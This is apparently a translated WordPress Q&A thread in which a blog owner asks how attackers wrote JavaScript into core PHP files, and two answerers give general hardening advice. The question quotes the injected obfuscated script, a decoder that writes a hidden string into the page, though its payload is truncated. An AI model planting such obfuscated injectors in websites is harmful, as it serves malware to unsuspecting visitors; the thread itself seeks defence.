Como os atacantes escrevem scripts em meus arquivos php?

4

Eu tenho um blog criado com o wordpress, agora eu tenho um problema. Atacantes gravam códigos javascript em meus arquivos.

Vamos supor que eu tenha buracos em meus scripts de plug-in, mas como eles podem gravar em arquivos php?

aqui faz parte da lista de arquivos php, na qual eles escrevem o script ( index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ... )

e este é o javascript que eles escrevem em

<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>

Como posso evitar esses ataques?

Eu não tenho nenhuma experiência com o wordpress, então qualquer ajuda será muito boa.

Muito obrigado

    
por Syom 31.01.2011 / 13:57

2 respostas

5

Oi @Syom:

Muitas vezes, os hackers têm acesso porque você usa o nome "admin" para o seu administrador e você tem uma senha fácil de hackear. Ou porque você não atualiza seu software e eles aproveitam algumas das falhas de segurança encontradas e corrigidas.

Aqui está um conjunto de slides que explicam como proteger seu site WordPress que acaba de ser apresentado no WordCamp Phoenix no fim de semana passado:

Aqui estão algumas postagens de Otto sobre o assunto:

por MikeSchinkel 31.01.2011 / 14:06
1

Existem várias maneiras possíveis:

  • login FTP / SSH comprometido;
  • login comprometido do WordPress;
  • configuração de segurança do servidor com falha;
  • servidor comprometido;
  • algum tipo de backdoor instalado;
  • etc.

Você deve entrar em contato com o suporte de hospedagem imediatamente e, em seguida, depende da qualidade e do preço da sua hospedagem, o quanto eles ajudarão.

Além disso, se você não tiver confiança em habilidades técnicas, sugiro procurar alguém que lide com a limpeza de blogs hackeados profissionalmente, caso contrário, você não terá certeza sobre detalhes específicos de segurança e hackers no futuro.

    
por Rarst 31.01.2011 / 14:57